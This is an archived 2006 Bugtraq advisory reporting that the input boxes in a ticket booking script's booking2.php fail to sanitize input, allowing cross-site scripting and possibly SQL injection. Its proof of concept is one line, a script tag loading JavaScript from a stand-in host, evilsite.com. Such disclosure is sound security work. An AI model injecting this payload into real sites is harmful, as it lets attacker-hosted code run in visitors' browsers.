[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

mole.com.ua Ticket Booking Script - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: mole.com.ua Ticket Booking Script - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 9 Jun 2006 05:04:04 -0000

Ticket Booking Script

Homepage:
http://www.mole.com.ua

Effected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanatize userinput before geenrating it 
and then submitting it to a MySQL db. This can causes XSS examples as well as 
possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of 
the input boxes

Prev by Date: mole.com.ua Booking Script
Next by Date: Docebo Kms 3.0.3, Remote command execution
Previous by thread: mole.com.ua Booking Script
Next by thread: Docebo Kms 3.0.3, Remote command execution
Index(es):
- Date
- Thread